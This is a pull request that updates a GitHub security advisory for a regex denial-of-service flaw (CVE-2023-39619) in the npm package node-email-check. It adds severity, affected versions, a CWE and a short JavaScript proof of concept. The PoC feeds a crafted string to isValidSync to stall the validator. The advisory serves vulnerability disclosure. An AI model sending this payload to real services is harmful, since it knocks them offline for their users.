### PR TITLE
[GHSA-9242-6p36-6256] ReDos in NPMJS Node Email Check v.1.0.4 allows an...

### DIFF
--- a/advisories/unreviewed/2023/10/GHSA-9242-6p36-6256/GHSA-9242-6p36-6256.json
+++ b/advisories/unreviewed/2023/10/GHSA-9242-6p36-6256/GHSA-9242-6p36-6256.json
@@ -1,17 +1,42 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-9242-6p36-6256",
-  "modified": "2023-10-25T18:32:22Z",
+  "modified": "2023-10-25T18:32:33Z",
   "published": "2023-10-25T18:32:22Z",
   "aliases": [
     "CVE-2023-39619"
   ],
-  "details": "ReDos in NPMJS Node Email Check v.1.0.4 allows an attacker to cause a denial of service via a crafted string to the scpSyntax component.",
+  "summary": "ReDos in NPMJS Node Email Check",
+  "details": "### Description\nReDos in NPMJS Node Email Check v.1.0.4 allows an attacker to cause a denial of service via a crafted string to the scpSyntax component.\n\n### PoC\n```javascript\nconst emailCheck = require('node-email-check');\n\n// async request with mx check\n//await emailCheck.isValid('example@email.com');\n// sync request without mx check\nconsole.time('[ + ] Time passed -> ');\n//payload\nvar chck = emailCheck.isValidSync('-@{IPv6:5:3:2:3:227IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"IPv6\"');\nconsole.log(chck);\nconsole.timeEnd('[ + ] Time passed -> ');\n```",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+    }
   ],
   "affected": [
-
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "node-email-check"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "none"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.0.4"
+      }
+    }
   ],
   "references": [
     {
@@ -21,6 +46,10 @@
     {
       "type": "WEB",
       "url": "https://gist.github.com/6en6ar/712a4c1eab0324f15e09232c77ea08f8"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/teomantuncer/node-email-check"
     },
     {
       "type": "WEB",
@@ -33,9 +62,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-1333"
     ],
-    "severity": null,
+    "severity": "HIGH",
     "github_reviewed": false,
     "github_reviewed_at": null,
     "nvd_published_at": null


### PR DESCRIPTION
**Updates**
- Affected products
- CVSS
- CWEs
- Description
- Severity
- Source code location
- Summary

**Comments**
Due to an incorrectly composed Regex expression, an attacker has the opportunity to cause a denial of service. I added a link to the npm package to this issue, added a description about vulnerable versions, and also added a PoC to the description